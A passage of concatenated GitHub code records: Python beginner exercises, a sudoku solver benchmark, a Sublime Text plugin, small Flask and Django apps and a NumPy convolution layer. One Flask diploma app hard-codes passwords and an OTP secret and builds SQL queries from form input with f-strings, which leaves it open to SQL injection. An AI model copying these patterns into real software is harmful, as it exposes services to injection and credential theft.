18 anyos\")\nelse:\n\tprint(\"Eres mayor de edad\")\n\"\"\"\nprovincia = \"Girona\"\nif(provincia == \"Barcelona\"):\n\tprint(\"Oferta Barcelona\")\nelif(provincia == \"Girona\"):\n\tprint(\"Oferta Girona\")\nelif(provincia == \"Lleida\" or provincia == \"Tarragona\"):\n\tprint(\"Oferta Tarraco LLeida\")\nelse:\n\tprint(\"Oferta resto mundial\")\n\nestado = 110\nwhile estado <= 10:\n\tprint(\"Numero: \" + str(estado))\n\testado = estado + 1\n\nmi_tupla = ('David', 21, 'Barcelona', True)\n\nmi_lista = ['Jose', 21, 'Girona', True]\n\nfor i, valor in enumerate(mi_lista):\n\tif not isinstance(valor, bool) and isinstance(valor, int):\n\t\tmi_lista[i] = int(valor) + 1\n\nprint(mi_lista)\n\nfoods = {}\n\nfoods[\"banana\"] = \"A delicious and tasty treat!\"\nfoods[\"dirt\"] = \"Not delicious. Not tasty. DO NOT EAT!\"\n\nfoods[\"banana\"]\n","repo_name":"cometilla/Python","sub_path":"p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72974837432","text":"from __future__ import print_function\n\nimport Solver\nimport sys\nimport os\nimport os.path as op\nimport re\nimport statsmodels.api as sm\n\nimport matplotlib as mpl\nmpl.use(\"Agg\") # This lets you plot (and save) if you run remotely.\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom numpy import *\nimport collections\nimport json\n\n#thispath = op.abspath(op.dirname(__file__))\nthispath = op.abspath(os.getcwd())\nimpath = op.join(thispath, \"images\")\n\n\nmpl.rcParams['lines.linewidth'] = 3\nmpl.rcParams[\"figure.figsize\"] = 7, 5\nmpl.rcParams[\"figure.titlesize\"]=\"xx-large\"\nmpl.rcParams[\"figure.titleweight\"]=\"bold\"\nmpl.rcParams['axes.titlesize']=\"x-large\" # fontsize of the axes title \nmpl.rcParams['axes.labelsize']=\"large\"\nmpl.rcParams[\"xtick.major.size\"]=6\nmpl.rcParams[\"xtick.labelsize\"]=\"large\"\nmpl.rcParams[\"ytick.labelsize\"]=\"large\"\nmpl.rcParams[\"ytick.major.size\"]=6\nmpl.rcParams[\"grid.alpha\"] = 0.5\nmpl.rcParams[\"axes.grid\"] = True\nmpl.rcParams[\"savefig.dpi\"] = 1000\nmpl.rcParams[\"savefig.bbox\"] = \"tight\"\n\nhristics = [\"Fixed Selector\", \"Most Constrained Variable\"]\n\ndef valid(sequence): # checks if sequence is valid or not\n if len(sequence) != 81:\n \treturn False\n validity = [str(i) for i in range(10)]\n for i in sequence:\n \tif i not in validity:\n \t\treturn False\n return True\n\nproblemSet = []\nproblemComments = []\ndatafile = op.join(thispath, \"TESTCASES.txt\")\n\ndef getFile(f=datafile):\n\n with open(f, 'r') as f:\n \tlines = [line.strip() for line in f]\n\n problem = \"\"\n for i, line in enumerate(lines):\n \tif i % 11 == 0:\n \t\tproblemComments.append(line)\n \telif i % 11 == 10:\n \t\tif not valid(problem):\n \t\t\traise ValueError(\"Invalid board sequence.\")\n \t\tproblemSet.append(problem)\n \t\tproblem = \"\"\n \telse:\n \t\tproblem += ''.join(line.split())\n\n return problemSet, problemComments\n\ndef getDifficulty(prob, comm):\n\n diffdict = {'easy': [[],[]], 'medium': [[],[]], 'hard': [[],[]], 'evil': [[],[]]}\n sudoku = Solver.Solver(1, 2)\n cnt = 0\n for problem, comment in zip(prob,comm):\n \n fstr = re.search('[a-zA-Z][a-zA-Z]', comment)\n fstr = fstr.group(0).lower()\n\n initFill = sudoku.start(problem)\n for k in diffdict.keys():\n \t if k.startswith(fstr):\n diffdict[k][0].append(cnt)\n diffdict[k][1].append(initFill)\n continue\n cnt += 1\n\n return diffdict\n\n\ndef runall(ht, su, prob=[], comm=[], f=datafile):\n\n \n if not prob:\n prob, comm = getFile(f)\n\n nBacktracks = []\n nRuleNakedK = []\n\n times = []\n\n sudoku = Solver.Solver(ht, su)\n for problem, comment in zip(prob, comm):\n# print(\"--------------------------------------------------\")\n# print(\"--------------------------------------------------\")\n# print(\"Running: \" + comment)\n\n fstr = re.search('[a-zA-Z][a-zA-Z]', comment)\n\n sudoku.start(problem)\n # print(\"\\nStarting board:\")\n# # sudoku.printBoard()\n#\n# print(\"solving....\")\n success, nBackTrack, nStrategy, time = sudoku.solve()\n\n if not success:\n print(\"Whoa! Problem \" + fstr + \" FAILED: \")\n inp = int(input(\"What should we do. Press 1 to abort, 0 to continue: \"))\n if inp:\n print(\"Abobo! \")\n sys.exit(-1)\n\n #IsSucc.append(int(success))\n\n # print(\"\\nFinal board:\")\n # sudoku.printFullBoard()\n\n# print(\"Time: \\t\\t\\t\\t \", time)\n# print(\"Num backtrackings: \\t\\t \", nBackTrack)\n# for i, n in enumerate(nStrategy):\n# print(\"Num Strategy Level: \\t\", i+1, n)\n\n \n nRuleNakedK.append(tuple(nStrategy))\n times.append(time)\n nBacktracks.append(nBackTrack)\n\n return array(nBacktracks), array(nRuleNakedK).T, array(times)\n\n\nif __name__ == \"__main__\":\n\n prob, comm = getFile()\n\n #Returns dict\n difficulty = getDifficulty(prob, comm)\n dfill = {k: mean(i[1]) for k, i in difficulty.items()}\n diffidx = {k: array(i[0]) for k, i in difficulty.items()}\n\n print(\"Average filled-in num:\")\n [print(k, i) for k, i in dfill.items()] \n diffic = ['easy', 'medium', 'hard', 'evil']\n\n lsys = len(sys.argv)\n\n if lsys < 2:\n heuristic = (0, 1)\n strat = tuple(range(4))\n hstrat = [(h,s) for h in heuristic for s in strat]\n else:\n if lsys > 4 or lsys == 2:\n print(\"Give both heuristic and strategy level and no more. \")\n sys.exit(-1)\n heuristic = bool(int(sys.argv[2])-1)\n hstrat = [tuple(heuristic, int(sys.argv[3]))]\n\n fullMean = {}\n fullStd = {}\n abc = []\n coll = {}\n\n for hs in hstrat:\n heuristic, strategy = hs\n hkey = hristics[heuristic]\n if hkey not in fullMean.keys():\n fullMean[hkey] = []\n fullStd[hkey] = []\n\n nBack, nNaked, timing = runall(heuristic, strategy, prob, comm) \n metrics = [\"time\", \"backtrack\", \"strategy\"]\n dc = collections.defaultdict(dict)\n dcsum = collections.defaultdict(dict)\n dcstd = collections.defaultdict(dict)\n for k, d in diffidx.items():\n dc[k]['time'] = timing[d]\n dc[k]['backtrack'] = nBack[d]\n dc[k]['strategy'] = nNaked[:, d]\n\n for k, d in dc.items():\n print(\"----------------\")\n print(\"Problem Type: \" + k)\n for k1, d1 in d.items():\n results = mean(d1.T, axis=0)\n rstd = std(d1.T, axis=0)\n abc.append((results, rstd))\n print(\"Average \" + k1 + \": \" + str(results))\n dcsum[k][k1] = results\n dcstd[k][k1] = rstd\n\n\n print(\"----------------\")\n fullMean[hkey].append(dcsum)\n fullStd[hkey].append(dcstd)\n if strategy == 3:\n coll[hkey] = dc\n \n\n for k, d in fullMean.items():\n print(\"----------------\")\n print(\"----------------\")\n print(\"Run Type: \", k)\n for ii, dsubs in enumerate(d):\n print(\"Inference Rules: \", ii)\n for k1, d1 in dsubs.items():\n print(\"Difficulty: \", k1)\n for k2, d2 in d1.items():\n print(\"Metric \" + k2 + \" | Result : \" + str(d2))\n\n print(\"----------------\")\n\n#%% Plots \n plott = 1\n\n if plott:\n ftime, atime = plt.subplots(1,2, sharey=True)\n fback, aback = plt.subplots(1,2, sharey=True)\n ftime.suptitle(\"Runtime Performance\")\n fback.suptitle(\"Backtracks\")\n\n axi = 0\n drange = list(range(4))\n wid = 0.2\n ttot = []\n btot = []\n for k, d in fullMean.items():\n rct = []\n rcb = []\n for ii, dsubs in enumerate(d):\n ti = []\n bi = []\n ts = []\n bs = []\n label = []\n dr = [d + (ii-2)*wid for d in drange]\n #drn = [[xstrt[xi] + d + ii*wid/2 for d in drange] for xi in range(len(dsubs))]\n for k1, do in dsubs.items():\n ti.append(do['time'])\n bi.append(do['backtrack'])\n ts.append(fullStd[k][ii][k1]['time']/4)\n bs.append(fullStd[k][ii][k1]['backtrack']/10)\n label.append(k1)\n \n ttot.extend(ti)\n btot.extend(bi)\n print(ti)\n rt = atime[axi].bar(dr, ti, wid, yerr=ts)\n rct.append(rt)\n rb = aback[axi].bar(dr, bi, wid, yerr=bs)\n rcb.append(rb)\n \n \n atime[axi].set_title(k)\n aback[axi].set_title(k)\n atime[axi].set_xticks(drange)\n aback[axi].set_xticks(drange)\n atime[axi].set_xticklabels(label)\n aback[axi].set_xticklabels(label)\n if not axi:\n atime[axi].set_ylabel('Average runtime (s)')\n aback[axi].set_ylabel('Average backtracks per puzzle')\n legtime = atime[axi].legend([r[0] for r in rct], (drange))\n legback = aback[axi].legend([r[0] for r in rcb], (drange))\n legtime.set_title('Inference Level')\n legback.set_title('Inference Level')\n \n atime[axi].set_xlabel('Difficulty')\n aback[axi].set_xlabel('Difficulty')\n axi+=1\n\n ftime.savefig(\"TimePerform.pdf\")\n fback.savefig(\"BackPerform.pdf\")\n\n fc = plt.figure(\"Correlate\")\n plt.scatter(btot, ttot)\n bX = sm.add_constant(btot)\n mdl = sm.OLS(ttot, bX)\n mdf = mdl.fit()\n pm = mdf.params\n ba = linspace(0, max(btot))\n plt.plot(ba, pm[1] * ba + pm[0], 'k')\n plt.xlabel(\"Average Runtime (s)\")\n plt.xlabel(\"Average backtracks per puzzle\")\n \n plt.show()\n","repo_name":"ASK1995/Artificial-Intelligence","sub_path":"Project 3/allDan.py","file_name":"allDan.py","file_ext":"py","file_size_in_byte":8884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"15276041822","text":"# coding=utf-8\nfrom flask import Flask\nimport tensorflow_softmax_restore as tfsr\n\napp = Flask(__name__)\nPORT=8200\n\n@app.route('/')\ndef index2():\n file = 'test0.txt'\n return tfsr.getresult(file)\n\nif __name__ == '__main__':\n app.run(debug=True, port=PORT)\n ","repo_name":"yuchengle/tensorflow_softmax01","sub_path":"tensorflow_softmax_flask.py","file_name":"tensorflow_softmax_flask.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11620210828","text":"class Vault:\r\n def __init__(self, sickles, galleons, knuts) -> None:\r\n self.sickles= sickles\r\n self.galleons= galleons\r\n self.knuts= knuts\r\n\r\n def __str__(self) -> str:\r\n return f\"{self.galleons} Galleons, {self.sickles} Sickels, {self.knuts} Knuts\"\r\n \r\n def __add__(self, other):\r\n galleons= self.galleons + other.galleons\r\n sickels= self.sickles + other.sickles \r\n knuts= self.knuts + other.knuts\r\n return Vault(galleons, sickels, knuts)\r\n \r\n \r\npotter= Vault(100,50, 25)\r\nprint(potter)\r\n\r\nwesley= Vault(25,50, 100)\r\nprint(wesley)\r\n\r\ntotal = potter+ wesley\r\nprint(total)","repo_name":"arriynn/CS50P_Python_Programming","sub_path":"Lecture's/vault.py","file_name":"vault.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"38015798106","text":"from django.urls import include, path\n\nimport django_devicectl.views as views\n\n# from django.views.generic import TemplateView\n\n\nurlpatterns = [\n path(\n \"api/\",\n include(\n (\"django_devicectl.rest.urls.devicectl\", \"devicectl_api\"),\n namespace=\"devicectl_api\",\n ),\n ),\n path(\n \"//\",\n views.view_instance_load_facility,\n name=\"devicectl-home\",\n ),\n path(\"/\", views.view_instance, name=\"devicectl-home\"),\n]\n","repo_name":"fullctl/devicectl","sub_path":"src/django_devicectl/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"31687236780","text":"from flask import Flask,render_template,request,redirect,url_for\r\nimport sqlite3\r\nimport datetime\r\napp = Flask(__name__,template_folder=\"templets\",static_folder=\"static\")\r\n\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n return render_template(\"index.html\")\r\n\r\n@app.route(\"/status\")\r\ndef status():\r\n return render_template(\"status.html\")\r\n\r\n@app.route(\"/form/\")\r\ndef form():\r\n return render_template(\"form.html\")\r\n@app.route(\"/probid\",methods = ['POST'])\r\ndef probid():\r\n now = datetime.datetime.now()\r\n con = sqlite3.connect(\"data.db\")\r\n cur = con.cursor()\r\n fname = request.form.get('01')\r\n lname = request.form.get('02')\r\n email = request.form.get('03')\r\n phone = request.form.get('04')\r\n prob = request.form.get('05')\r\n print(fname,lname,email,phone,prob)\r\n f = cur.execute(\"SELECT * FROM Data\")\r\n id = len(f.fetchall())+1\r\n pid = int(str(now.day)+str(now.month)+str(now.year)+str(now.hour)+str(now.minute)+str(now.second))\r\n dat = str(now.date())\r\n tim = str(now.time())\r\n cur.execute(f\"INSERT INTO Data VALUES({id},{pid},'{fname}','{lname}','{email}',{phone},'{prob}',1,'{dat}','{tim}')\")\r\n con.commit()\r\n con.close()\r\n return render_template(\"probid.html\",proid = pid)\r\n\r\n@app.route(\"/getstatus\",methods=['POST'])\r\ndef gstatus():\r\n con = sqlite3.connect(\"data.db\")\r\n cur = con.cursor()\r\n pid = request.form.get('01')\r\n f = cur.execute(f\"SELECT status FROM Data WHERE ProbId == {int(pid)}\")\r\n stat = f.fetchall()[0][0]\r\n return render_template(\"stat.html\",sdata = stat)\r\n\r\n@app.route(\"/admP\",methods = ['POST'])\r\ndef adminp():\r\n user = request.form.get(\"user\")\r\n passwd = request.form.get(\"passwd\")\r\n credentials = {\"admin\":\"TechoSolvz@113322\",\"Rahul1122\":\"Rahul@9676\"}\r\n if user in credentials.keys() and credentials[user] == passwd:\r\n return render_template(\"AdminPage.html\")\r\n else:\r\n return '

Enter Correct credentials

',False\r\n@app.route(\"/admin\")\r\ndef admin():\r\n return render_template (\"admin.html\")\r\n\r\n@app.route(\"/up\",methods = ['POST'])\r\ndef adminup():\r\n data1 = request.form.get(\"01\")\r\n data2 = request.form.get(\"02\")\r\n if data1 == None and data2 == 'updb':\r\n return render_template(\"update.html\")\r\n else:\r\n return \"Error\"\r\n\r\n\r\n@app.route(\"/data\",methods=['POST'])\r\ndef data():\r\n data1 = request.form.get(\"01\")\r\n data2 = request.form.get(\"02\")\r\n if data1 == 'data' and data2 == None:\r\n con = sqlite3.connect(\"data.db\")\r\n cur = con.cursor()\r\n data = cur.execute(\"SELECT * FROM Data\")\r\n data = data.fetchall()\r\n con.close()\r\n return render_template(\"data.html\",data=data)\r\n else:\r\n return \"Error\"\r\n\r\n@app.route(\"/adminupdate\",methods = ['POST'])\r\ndef adminupdate():\r\n con = sqlite3.connect(\"data.db\")\r\n cur = con.cursor()\r\n pidd = request.form.get(\"pid\")\r\n col = request.form.get(\"col\")\r\n val = request.form.get(\"val\")\r\n cur.execute(f\"UPDATE Data SET {col}='{val}' WHERE Id={pidd}\")\r\n con.commit()\r\n return '

Data Updated

'\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n app.run(debug=True)","repo_name":"Rahulsree1/TechosolvZ","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"21228231773","text":"from django.contrib.auth.models import AbstractUser\nfrom django.db import models\n\n# Create your models here.\n\n\nclass Users(AbstractUser):\n email = models.EmailField(\n verbose_name='email address',\n max_length=255,\n unique=True,\n )\n","repo_name":"alf1983/todobv","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"73762531832","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('beater', '0008_album_sha1sum'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='album',\n name='sha1sum',\n ),\n migrations.AddField(\n model_name='song',\n name='sha1sum',\n field=models.CharField(max_length=40, null=True),\n ),\n ]\n","repo_name":"tpalko/freshbeats-pi","sub_path":"webapp/beater/migrations/0009_auto_20160514_0431.py","file_name":"0009_auto_20160514_0431.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33585120685","text":"import sublime\nimport sublime_plugin\nfrom subprocess import run, PIPE\nfrom threading import Thread\nimport time\nfrom datetime import datetime\nimport os\nimport sys\n\n\ndef execute_with_stdin(cmd, shell, cwd, text):\n before = time.perf_counter()\n # https://docs.python.org/3/library/subprocess.html#subprocess.run - new in version 3.5\n # therefore, this python file should be in your User package (which defaults to Python 3.8)\n # and you need to be using ST build >= 4050\n p = run(cmd, shell=shell, cwd=cwd, capture_output=True, input=text, encoding='utf-8')\n after = time.perf_counter()\n return (p, after - before)\n\n\ndef get_execution_action(cmd, shell_cmd):\n \"\"\" Determine what command to execute and whether or not the result should\n replace the selection or insert after it.\n \"\"\"\n\n # Check to see if the command says to execute in place or not\n do_replace = True\n if shell_cmd and shell_cmd[0] == '!':\n shell_cmd = shell_cmd[1:]\n do_replace = False\n elif cmd and cmd[0][0] == '!':\n cmd[0] = cmd[0][1:]\n do_replace = False\n\n # this shell_cmd/cmd logic was borrowed from Packages/Default/exec.py\n if shell_cmd:\n cmd_text = shell_cmd\n if sys.platform == \"win32\":\n # Use shell=True on Windows, so shell_cmd is passed through\n # with the correct escaping\n cmd = shell_cmd\n shell = True\n else:\n cmd = [\"/usr/bin/env\", \"bash\", \"-c\", shell_cmd]\n shell = False\n else:\n cmd_text = ' '.join(cmd)\n shell = False\n\n return shell, cmd, cmd_text, do_replace\n\n\ndef set_execution_annotations(view, regions, cmd_text):\n view.add_regions('pipe_cmd', regions,\n scope='comment', icon='circle',\n annotations=[cmd_text] * len(regions),\n flags=sublime.DRAW_NO_FILL)\n\n\nclass PipeTextCommand(sublime_plugin.TextCommand):\n \"\"\"Pipe text from ST - the selections, if any, otherwise the entire buffer contents\n - to the specified shell command.\n Useful for formatting XML or JSON in a quick and easy manner.\n i.e. a workaround for https://github.com/sublimehq/sublime_text/issues/3294\n This command requires Python >= 3.5, and therefore, ST build >= 4050, and for the\n package to have opted in to the Python 3.8 plugin host. (The User package is\n automatically opted-in.)\n \"\"\"\n def run(self, edit, cmd=None, shell_cmd=None, working_dir=None):\n if not shell_cmd and not cmd:\n raise ValueError(\"shell_cmd or cmd is required\")\n\n if shell_cmd and not isinstance(shell_cmd, str):\n raise ValueError(\"shell_cmd must be a string\")\n\n shell, cmd, cmd_text, do_replace = get_execution_action(cmd, shell_cmd)\n\n # if not all selections are non-empty\n if not all(self.view.sel()) and do_replace:\n # use the entire buffer instead of the selections\n regions = [sublime.Region(0, self.view.size())]\n else:\n # use the user's selections\n regions = self.view.sel()\n\n if not working_dir and self.view.file_name():\n working_dir = os.path.dirname(self.view.file_name())\n\n self.was_read_only = self.view.is_read_only()\n self.view.set_read_only(True)\n\n self.view.set_status('pipe_cmd', '[Executing pipe_cmd]')\n set_execution_annotations(self.view, regions, cmd_text)\n\n thread = Thread(\n target=self.execute,\n args=(cmd, shell, working_dir, cmd_text, regions, do_replace))\n thread.start()\n\n\n def finish(self):\n self.view.set_read_only(self.was_read_only)\n self.view.erase_status('pipe_cmd')\n\n def execute(self, cmd, shell, working_dir, cmd_text, regions, do_replace):\n failures = False\n start = time.perf_counter()\n logs = list()\n def log(message):\n nonlocal logs\n log_text = str(datetime.now()) + ' ' + message\n logs.append(log_text)\n print(log_text)\n\n for region in reversed(regions):\n text = self.view.substr(region)\n\n p, time_elapsed = execute_with_stdin(cmd, shell, working_dir, text)\n\n # TODO: also report the selection index?\n log(f'command \"{cmd!r}\" executed with return code {p.returncode} in {time_elapsed * 1000:.3f}ms')\n\n if p.returncode == 0:\n self.view.run_command('pipe_text_action', {\n 'region': [region.a, region.b],\n 'data': p.stdout,\n 'do_replace': do_replace,\n 'cmd_text': cmd_text\n })\n else:\n failures = True\n log(p.stderr.rstrip())\n\n total_elapsed = time.perf_counter() - start\n if failures:\n sublime.error_message('\\n'.join(logs)) # TODO: don't include the datetimes here?\n else:\n sublime.status_message(f'text piped and replaced successfully in {total_elapsed * 1000:.3f}ms')\n\n sublime.set_timeout(self.finish, 0)\n\n\nclass PipeTextActionCommand(sublime_plugin.TextCommand):\n def run(self, edit, cmd_text, region, data, do_replace):\n region = sublime.Region(region[0], region[1])\n\n regions = self.view.get_regions('pipe_cmd')\n regions.remove(region)\n set_execution_annotations(self.view, regions, cmd_text)\n\n was_read_only = self.view.is_read_only()\n self.view.set_read_only(False)\n\n if do_replace:\n self.view.replace(edit, region, data)\n else:\n self.view.insert(edit, region.b, data)\n\n self.view.set_read_only(was_read_only)\n\n\n# example for pretty printing XML using xmllint:\n# TODO: option for no xml prolog when working with selections? https://stackoverflow.com/q/37118327/4473405\n#view.run_command('pipe_text', { 'cmd': ['xmllint', '--format', '-'] })\n\n# example for pretty printing JSON using jq:\n#view.run_command('pipe_text', { 'cmd': ['jq', '.'] })\n\n#view.run_command('pipe_text', {\"shell_cmd\": \"sort | uniq\"})","repo_name":"STealthy-and-haSTy/PipeText","sub_path":"pipe_text.py","file_name":"pipe_text.py","file_ext":"py","file_size_in_byte":6112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"5245645066","text":"import math\r\n\r\nBULLET_MAX_DISTANCE = 500\r\n\r\n\r\nclass Bullet:\r\n def __init__(self, x, y, r, speed, angle):\r\n self.x = x\r\n self.y = y\r\n self.r = r\r\n self.speed = speed\r\n self.angle = angle\r\n \r\n self.distance = 0\r\n \r\n def is_gone(self):\r\n return self.distance > BULLET_MAX_DISTANCE\r\n \r\n def move_bullet(self):\r\n self.x += self.speed*math.cos(self.angle)\r\n self.y += self.speed*math.sin(self.angle)\r\n \r\n self.distance += 10\r\n \r\n","repo_name":"soladobola/dqn-rl-asteroids","sub_path":"Bullet.py","file_name":"Bullet.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"3458306974","text":"from .. import base\nimport yaml\nfrom typing import List, final\nimport pickle\nimport pfc_util as pfc\n\n\n@final\nclass CalcConfig(\n base.SpecifiesRotationAngle,\n base.SpecifiesPFCParams,\n base.SpecifiesShape,\n base.SpecifiesPrecision,\n base.ConfigBase\n ):\n\n def __init__(self, config: dict):\n super().__init__(config)\n\n with open(f'{self.file_path(\"pfc\")}/log.pkl', 'rb') as f:\n self.log: List[pfc.toolkit.MuSearchRecord] = pickle.load(f)\n\n self.mu_ = self.log[-1].mu[-1]\n\n self.lx_min = self.to_float(config['lx_min'])\n self.lx_max = self.to_float(config['lx_max'])\n\n self.eps_ = self.to_float(self.eps)\n self.alpha_ = self.to_float(self.alpha)\n self.beta_ = self.to_float(self.beta)\n\n self.solid_file = f'{self.file_path(\"pfc\")}/unit_sol.field'\n self.liquid_file = f'{self.file_path(\"pfc\")}/unit_liq.field'\n \n\ndef parse_config(path: str):\n with open(path, 'r') as f:\n config = yaml.safe_load(f)\n return CalcConfig(config)\n\n\n\n","repo_name":"michael-960/pfc_interface","sub_path":"utils/calc/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"22630953696","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom PIL import Image \n\nimport pyotp\nimport os\n\nimport timestamp as tmstp\nimport ajout_texte as aj_txt\nimport stegano as st\nimport sign_verify as sv\nimport testmail as tm\n\n\napp = Flask(__name__)\n\ntmstp.initializeBdd()\n\nauth = False\n\n\n@app.route('/')\ndef root():\n if auth:\n return render_template('index.html')\n else:\n return render_template('authentication.html')\n\n@app.route('/authentication', methods=['POST'])\ndef authentication():\n nom = request.form['nom']\n mdp = request.form['mdp']\n global auth\n if nom == 'admin' and mdp == '1234': \n auth = True\n else:\n auth = False\n return redirect('/')\n\n\n@app.route('/formulaire')\ndef formulaire():\n if auth:\n return render_template('formulaire.html', creation=\"\")\n else:\n return redirect('/')\n\n\n\n\ndef creerPass():\n secret = 'KillyanPovoaMaximeDubus'\n totp = pyotp.TOTP(secret)\n return totp\n\n\n@app.route('/creation_diplome', methods=['POST'])\ndef creation_diplome():\n if auth:\n nom = request.form['nom']\n prenom = request.form['prenom']\n intitule = request.form['intitule']\n mail = request.form['mail']\n otp = request.form['otp']\n img = Image.open('image_test.png')\n\n totp = creerPass()\n\n if totp.verify(otp):\n timestamp = tmstp.getTimestamp(img, nom, prenom, intitule)\n aj_txt.ajoutTxt(nom, prenom, intitule, timestamp, img)\n qrcode = sv.create_qrcode(nom, prenom, intitule)\n img.paste(qrcode, (1430, 950))\n img.save('img2.png')\n tm.envoi_mail(mail)\n os.system(\"rm -Rf img2.png\")\n return redirect(url_for('conf_creation', ind=0))\n\n else:\n return redirect(url_for('conf_creation', ind=1))\n \n else:\n return redirect('/')\n\n@app.route('/conf_creation/')\ndef conf_creation(ind):\n if ind == 0:\n rapport = \"Diplôme créé et envoyé avec succès.\"\n else:\n rapport = \"Erreur lors de la création du diplôme. L'OTP fourni est inexact.\"\n return render_template('conf_creation.html', rapport=rapport)\n\n\n@app.route('/verif_page')\ndef verifPage():\n if auth:\n return render_template('verifPage.html')\n else:\n return redirect('/')\n\n\n\n@app.route('/verif_diplome', methods=['POST'])\ndef verifDiplome():\n if auth:\n img1 = request.files['img']\n img = Image.open(img1)\n nom = request.form['nom']\n prenom = request.form['prenom']\n intitule = request.form['intitule']\n txt = str(nom) + str(prenom) + str(intitule)\n while (len(txt)<64):\n txt = txt + \"0\"\n longueur = 64 + 7331\n msg = st.recuperer(img, longueur)\n bloc1 = msg[:64]\n bloc2 = msg[64:]\n \n verif_tmstp = tmstp.verifTimestamp(bloc2)\n img.crop((1430, 950, 1600, 1120)).save('extracted_qrcode.png')\n\n verif_qrcode=sv.verif_qrcode(nom, prenom, intitule)\n \n bool1 = bloc1 == txt \n bool2 = verif_tmstp == \"Verification: OK\\n\"\n bool3 = verif_qrcode == \"Verified OK\\n\"\n\n\n if bool1 and bool2 and bool3 :\n ind = 1\n elif not bool1 and not bool2 and not bool3:\n ind = 2\n elif not bool1 and not bool2:\n ind = 3\n elif not bool1 and not bool3:\n ind = 4\n elif not bool3 and not bool2:\n ind = 5\n elif not bool1:\n ind = 6\n elif not bool2:\n ind = 7\n elif not bool3:\n ind = 8\n return redirect(url_for('rapport', ind=ind))\n\n else:\n return redirect('/')\n\n\n@app.route('/rapport/')\ndef rapport(ind):\n\n error1 = \"-Le texte caché ne correspond pas avec les informations que vous avez rentrées.\"\n error2 = \"-La vérification du timestamp a échoué.\"\n error3 = \"-La vérification de la signature a échoué.\"\n lst_errors = []\n\n if auth:\n if ind == 1:\n rapport = \"Diplôme valide\"\n elif ind == 2:\n rapport = \"Diplôme invalide\"\n lst_errors.append(error1)\n lst_errors.append(error2)\n lst_errors.append(error3)\n elif ind == 3:\n rapport = \"Diplôme invalide\"\n lst_errors.append(error1)\n lst_errors.append(error2)\n elif ind == 4:\n rapport = \"Diplôme invalide\"\n lst_errors.append(error1)\n lst_errors.append(error3)\n elif ind == 5:\n rapport = \"Diplôme invalide\"\n lst_errors.append(error2)\n lst_errors.append(error3)\n elif ind == 6:\n rapport = \"Diplôme invalide\"\n lst_errors.append(error1)\n elif ind == 7:\n rapport = \"Diplôme invalide\"\n lst_errors.append(error2)\n elif ind == 8:\n rapport = \"Diplôme invalide\"\n lst_errors.append(error3)\n return render_template('rapport.html', rapport = rapport, lst_errors=lst_errors, ind=ind)\n\n else:\n return redirect('/')\n\n\n\n\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', port=8080, debug=True)\n","repo_name":"maximedbs1/projet-crypto","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71633444150","text":"# Do not import any additional 3rd party external libraries as they will not\n# be available to AutoLab and are not needed (or allowed)\n\nimport numpy as np\nfrom resampling import Downsample1d\n\n\ndef sliding_window_view(x, w_shape, axises):\n x_shape = [dim for dim in x.shape]\n for axis, dim in zip(axises, w_shape):\n x_shape[axis] = x_shape[axis] - dim + 1\n\n out_shape = x_shape + list(w_shape)\n out_strides = x.strides + tuple(x.strides[axis] for axis in axises)\n return np.lib.stride_tricks.as_strided(x, strides=out_strides, shape=out_shape, writeable=False)\n\n\nclass Conv1d_stride1:\n def __init__(self, in_channels, out_channels, kernel_size,\n weight_init_fn=None, bias_init_fn=None):\n # Do not modify this method\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = kernel_size\n\n if weight_init_fn is None:\n self.W = np.random.normal(\n 0, 1.0, (out_channels, in_channels, kernel_size))\n else:\n self.W = weight_init_fn(out_channels, in_channels, kernel_size)\n\n if bias_init_fn is None:\n self.b = np.zeros(out_channels)\n else:\n self.b = bias_init_fn(out_channels)\n\n self.dLdW = np.zeros(self.W.shape)\n self.dLdb = np.zeros(self.b.shape)\n self.A = None\n\n def forward(self, A):\n \"\"\"\n Argument:\n A (np.array): (batch_size, in_channels, input_size)\n Return:\n Z (np.array): (batch_size, out_channels, output_size)\n \"\"\"\n self.A = A\n # A_stride (np.array): (batch_size, in_channels, window_count, kernel_size)\n # W (np.array): (out_channel, in_channel, kernel_size)\n A_stride = sliding_window_view(A, (self.kernel_size,), (2,))\n # b: batch, i: in_channel, w: window, k: kernel_size, o: 